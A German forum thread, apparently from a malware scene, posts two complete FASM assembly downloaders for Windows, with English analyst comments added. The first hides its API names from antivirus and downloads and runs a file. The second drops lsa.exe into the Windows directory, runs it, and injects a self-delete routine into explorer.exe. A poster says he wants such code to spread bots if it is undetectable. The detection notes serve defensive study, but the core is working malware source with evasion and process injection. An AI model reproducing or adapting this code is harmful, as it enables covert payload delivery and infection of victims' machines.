Simpler Webdownloader,
keine Ahnung für was man ihn brauchen kann, aber mir war langweilig.
include '%include%/WIN32AX.inc'
; Data section (FASM, 32-bit Windows). url and ziel are the download source
; and the destination path; the remaining items are buffers and slots that
; the code fills in at run time.
.data
; Download source; the listing shows only the placeholder "url".
url db "url",0
; Destination path ("Ziel" = target): main passes it to the download call
; and afterwards to ShellExecuteA.
ziel db "C:\test.exe",0
; Reserve a few bytes. rd reserves dwords, so these are 40 and 72 bytes for
; a 10- and an 18-character name. No code writes a terminating zero;
; presumably the strings rely on the reserved space being zero-filled when
; the image is loaded -- confirm.
urlmon rd 10
Down rd 18
; Receives the module handle returned by LoadLibraryA.
dllhandle rd 1
; Receives the function pointer returned by GetProcAddress.
DownloadFile rd 1
; main: download-and-execute stub (ATT&CK T1105, ingress tool transfer).
;   1. assembles the strings "URLMON.DLL" and "URLDownloadToFileA" in memory
;   2. LoadLibraryA + GetProcAddress to resolve the download API by name
;   3. URLDownloadToFileA(0, url, ziel, 0, 0)
;   4. ShellExecuteA(HWND_DESKTOP, NULL, ziel, NULL, NULL, SW_SHOWNORMAL)
;   5. ExitProcess(0)
; Analyst notes:
;   - Neither name is stored contiguously in the file, so a plain string
;     search for them finds nothing. The scrambled immediates below ('U3SM',
;     'UbcD', 'oRdT', ...) are fixed byte patterns in the code and can be
;     matched instead.
;   - LoadLibraryA, GetProcAddress, ShellExecuteA and ExitProcess are called
;     through import slots (call [name]) and stay visible as imports.
;   - Behaviourally: a process loads urlmon.dll, writes an .exe to disk and
;     immediately launches it (file-create followed by process-create on the
;     same path).
;   - No return value is checked; every step runs even if the previous one
;     failed.
.code
main:
; Write "urlmon.dll" at run time, because of AV products.
; The writes overlap: bytes 0-3 become "U3SM", bytes 4-7 "ON.D", then the
; word at offset 1 overwrites "3S" with "RL" and the word at offset 8 appends
; "LL", giving "URLMON.DLL".
mov dword [urlmon], 'U3SM'
mov dword [urlmon+4d], 'ON.D'
mov word [urlmon+1d], 'RL'
mov word [urlmon+8d], 'LL'
; Load urlmon.dll; the handle is stored without a NULL check.
push urlmon
call [LoadLibraryA]
mov [dllhandle],eax
; Write "URLDownloadToFileA" at run time.
; Same overlapping-store scheme: "UbcD" + "ownl" + "oRdT", then the word at
; offset 1 turns "bc" into "RL", "oFil" and "eA" are appended, and the byte at
; offset 9 replaces 'R' with 'a'.
mov dword [Down], 'UbcD'
mov dword [Down+4d], 'ownl'
mov dword [Down+8d], 'oRdT'
mov word [Down+1d], 'RL'
mov dword [Down+12d], 'oFil'
mov word [Down+16d], 'eA'
mov byte [Down+9d], 'a'
; API address: GetProcAddress(dllhandle, Down); result stored unchecked.
push Down
push [dllhandle]
call [GetProcAddress]
mov [DownloadFile],eax
; Download: arguments are pushed right to left, so the call is
; URLDownloadToFileA(0, url, ziel, 0, 0).
push 0
push 0
push ziel
push url
push 0
call [DownloadFile]
; Execute the downloaded file, whether or not the download succeeded.
push SW_SHOWNORMAL
push NULL
push NULL
push ziel
push NULL
push HWND_DESKTOP
call [ShellExecuteA]
push 0
call [ExitProcess]
.end main
Hab hier auch noch einen, wie siehts mit der Detection Rate von deinem aus? eventuell was gutes für mich zum Bot spreaden wenn er Fud ist.
; Small selfdeleting downloader
; by DiA/RRLF (c)06
; www.vx-dia.de.vu
include "%fasminc%\win32ax.inc"
; _invoke: call helper for code that runs at an address other than the one
; it was assembled for. It pushes the arguments in reverse order, so the
; first argument ends up on top of the stack, and then calls through the
; pointer stored at [ebp + proc]. ebp must hold the offset between the
; run-time and the assembled address; RemoteThreadStart computes it.
; With no arguments only the call is emitted.
macro _invoke proc,[arg]
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [ebp + proc] }
; Execution starts at the DowloadFile label (spelling as in the original).
entry DowloadFile
; Data and code share one section that is readable, writeable and executable.
; A section that is both writeable and executable is an anomaly that static
; PE triage can flag.
section '.code' code readable writeable executable
URL db "http://url.com/here.exe", 0 ;the executable to download
; NOTE(review): the file name resembles a Windows system process name;
; presumably chosen to blend in -- inference, not shown by the code.
SaveAs db "\lsa.exe", 0 ;save as, in windows directory
; WinINet session handle, URL handle and output file handle.
InetHandle dd ?
UrlHandle dd ?
FileHandle dd ?
; Byte count of the last InternetReadFile call; also the loop condition.
ReadNext dd ?
; 1024-byte transfer buffer and the byte count reported by WriteFile.
DownloadBuffer rb 1024d
BytesWritten dd ?
; Receives the Windows directory; SaveAs is appended to form the drop path.
WindowsDir rb 256d
; State for the process enumeration and the remote-thread injection.
ProcessEntryOwn PROCESSENTRY32
SnapHandleOwn dd ?
ProcessHandle dd ?
BaseAddress dd ?
; Structures passed to CreateProcess. No visible code initialises
; StartupInfo.
StartupInfo STARTUPINFO
ProcessInfo PROCESS_INFORMATION
; DowloadFile: fetches URL over WinINet into <Windows directory>\lsa.exe and
; starts it (ATT&CK T1105). On any failed check it jumps to
; DownloadFileError; on success it also falls through into
; DownloadFileError, so the self-delete stage runs in both cases.
; Analyst notes:
;   - InternetOpen receives URL as its first argument, which is the
;     user-agent string, so the HTTP request carries the URL text as its
;     User-Agent. That is a distinctive network indicator.
;   - Host indicators: a new executable written directly into the Windows
;     directory, then started by the process that wrote it.
DowloadFile:
; Build the drop path: WindowsDir = GetWindowsDirectory() + "\lsa.exe".
invoke GetWindowsDirectory,\
WindowsDir,\
256d
invoke lstrcat,\
WindowsDir,\
SaveAs
; Open a WinINet session; URL doubles as the agent string here.
invoke InternetOpen,\
URL,\
0,\
0,\
0,\
0
cmp eax, 0
je DownloadFileError
mov dword [InetHandle], eax
; Open the remote resource.
invoke InternetOpenUrl,\
dword [InetHandle],\
URL,\
0,\
0,\
0,\
0
cmp eax, 0
je DownloadFileError
mov dword [UrlHandle], eax
; Create the output file. CREATE_NEW fails if the file already exists.
; NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE, not 0, so
; the comparison below does not catch a failed create.
invoke CreateFile,\
WindowsDir,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_NEW,\
FILE_ATTRIBUTE_NORMAL,\
0
cmp eax, 0
je DownloadFileError
mov dword [FileHandle], eax
; Make ReadNext non-zero so the loop body runs at least once (presumably the
; variable is zero at load -- it is declared with dd ?).
inc dword [ReadNext]
; Copy loop: read up to 1024 bytes, write the number of bytes read, stop
; when a read reports 0 bytes. Neither call's return value is checked.
ReadNextBytes:
cmp dword [ReadNext], 0
je DownloadComplete
invoke InternetReadFile,\
dword [UrlHandle],\
DownloadBuffer,\
1024d,\
ReadNext
invoke WriteFile,\
dword [FileHandle],\
DownloadBuffer,\
dword [ReadNext],\
BytesWritten,\
0
jmp ReadNextBytes
; Release the file and WinINet handles, then start the dropped file.
DownloadComplete:
invoke CloseHandle,\
dword [FileHandle]
invoke InternetCloseHandle,\
dword [UrlHandle]
invoke InternetCloseHandle,\
dword [InetHandle]
; WindowsDir is passed as the application name; the command line is NULL.
; The result is not checked. Execution continues into DownloadFileError.
invoke CreateProcess,\
WindowsDir,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo
; DownloadFileError: self-delete stage, reached on download failure and also
; by fall-through after a successful download. It records its own file name
; and the address of DeleteFileA inside the block
; RemoteThreadStart..RemoteThreadEnd, copies that block into explorer.exe and
; starts it there as a thread, then exits so that the file can be deleted.
; Analyst notes:
;   - OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
;     CreateRemoteThread against another process is the remote-thread form of
;     process injection (ATT&CK T1055). The purpose here is file deletion
;     (T1070.004).
;   - Telemetry that records this: Sysmon event 10 (ProcessAccess on
;     explorer.exe with VM write / create-thread rights) and event 8
;     (CreateRemoteThread with explorer.exe as target).
;   - The region is committed PAGE_READWRITE, i.e. without execute
;     permission, and then used as a thread start address; where DEP is
;     enforced for the target process, execution from it is blocked.
;   - The DeleteFileA address is resolved in this process and used unchanged
;     in the target; the code assumes kernel32.dll is mapped at the same
;     address in both and does not verify it.
DownloadFileError:
; Own path goes into OwnFilename, which lies inside the block copied later.
invoke GetModuleFileName,\
0,\
OwnFilename,\
256
invoke LoadLibrary,\
"kernel32.dll"
cmp eax, 0
je Exit
; Resolve DeleteFileA; the result is stored without a NULL check.
invoke GetProcAddress,\
eax,\
"DeleteFileA"
mov dword [_DeleteFile], eax
; dwSize must be set before Process32First is called.
mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32
; 2 is the value of TH32CS_SNAPPROCESS: snapshot of all processes.
; NOTE(review): failure is reported as INVALID_HANDLE_VALUE, not 0, so the
; comparison below does not catch it.
invoke CreateToolhelp32Snapshot,\
2,\
0
cmp eax, 0
je Exit
mov dword [SnapHandleOwn], eax
invoke Process32First,\
dword [SnapHandleOwn],\
ProcessEntryOwn
; Walk the snapshot until an entry named "explorer.exe" (case-insensitive)
; is found. eax is the result of Process32First/Process32Next; 0 means there
; are no more entries, and the program exits.
NextTargetProcess:
cmp eax, 0
je Exit
invoke lstrcmpi,\
ProcessEntryOwn.szExeFile,\
"explorer.exe"
cmp eax, 0
je FoundExplorer
invoke Process32Next,\
dword [SnapHandleOwn],\
ProcessEntryOwn
jmp NextTargetProcess
FoundExplorer:
invoke CloseHandle,\
dword [SnapHandleOwn]
; Open the target with only the rights the next three calls need.
invoke OpenProcess,\
PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\
0,\
dword [ProcessEntryOwn.th32ProcessID]
cmp eax, 0
je Exit
mov dword [ProcessHandle], eax
; Allocate room for the code-plus-data block in the target process.
invoke VirtualAllocEx,\
dword [ProcessHandle],\
0,\
RemoteThreadEnd - RemoteThreadStart,\
MEM_COMMIT,\
PAGE_READWRITE
cmp eax, 0
je Exit
mov dword [BaseAddress], eax
; Copy the block, including OwnFilename and _DeleteFile, into the target.
invoke WriteProcessMemory,\
dword [ProcessHandle],\
dword [BaseAddress],\
RemoteThreadStart,\
RemoteThreadEnd - RemoteThreadStart,\
0
cmp eax, 0
je Exit
; Start a thread in the target at the copied block; result not checked.
invoke CreateRemoteThread,\
dword [ProcessHandle],\
0,\
0,\
dword [BaseAddress],\
0,\
0,\
0
invoke CloseHandle,\
dword [ProcessHandle]
; Every path ends here; exiting releases the lock on the program's own file.
Exit:
invoke ExitProcess,\
0
; RemoteThreadStart..RemoteThreadEnd: the block that is copied into the
; target process and run there as a thread. It holds code and the two data
; items the code needs, so it is self-contained once copied.
; Analyst note: the loop below retries DeleteFileA with no delay until it
; succeeds, so the host process spins on a CPU core for as long as the file
; cannot be deleted.
RemoteThreadStart:
; call/pop delta-offset idiom: the call pushes the run-time address of
; DeltaOffset, and subtracting the assembled address leaves in ebp the
; distance the block was moved. Every later reference adds ebp.
call DeltaOffset
DeltaOffset:
pop ebp
sub ebp, DeltaOffset
; Call the stored DeleteFileA pointer on the stored file name; a return
; value of 0 means the delete failed and it is tried again.
DeleteLoop:
lea eax, dword [ebp + OwnFilename]
_invoke _DeleteFile,\
eax
cmp eax, 0
je DeleteLoop
; Thread ends by returning from its start routine.
ReturnThread:
ret
; Data travelling with the code; both items are filled in by
; DownloadFileError before the block is copied.
RemoteDatas:
OwnFilename rb 256d
_DeleteFile dd ?
RemoteThreadEnd:
; Import table. Unlike the run-time name resolution used for DeleteFileA,
; every API here is a plain named import, so static triage sees the whole
; set. The combination CreateToolhelp32Snapshot / OpenProcess /
; VirtualAllocEx / WriteProcessMemory / CreateRemoteThread next to the
; WinINet download functions is a useful import-based heuristic.
section '.idata' import data readable writeable
library kernel, "kernel32.dll",\
wininet, "wininet.dll"
; kernel32: file I/O, process enumeration, process start, remote memory and
; remote thread APIs.
import kernel,\
WriteFile, "WriteFile",\
CreateFile, "CreateFileA",\
CloseHandle, "CloseHandle",\
lstrcat, "lstrcatA",\
GetWindowsDirectory, "GetWindowsDirectoryA",\
GetModuleFileName, "GetModuleFileNameA",\
LoadLibrary, "LoadLibraryA",\
GetProcAddress, "GetProcAddress",\
CreateToolhelp32Snapshot, "CreateToolhelp32Snapshot",\
Process32First, "Process32First",\
Process32Next, "Process32Next",\
lstrcmpi, "lstrcmpiA",\
CreateProcess, "CreateProcessA",\
OpenProcess, "OpenProcess",\
VirtualAllocEx, "VirtualAllocEx",\
WriteProcessMemory, "WriteProcessMemory",\
CreateRemoteThread, "CreateRemoteThread",\
ExitProcess, "ExitProcess"
; wininet: the HTTP download.
import wininet,\
InternetOpen, "InternetOpenA",\
InternetOpenUrl, "InternetOpenUrlA",\
InternetReadFile, "InternetReadFile",\
InternetCloseHandle, "InternetCloseHandle"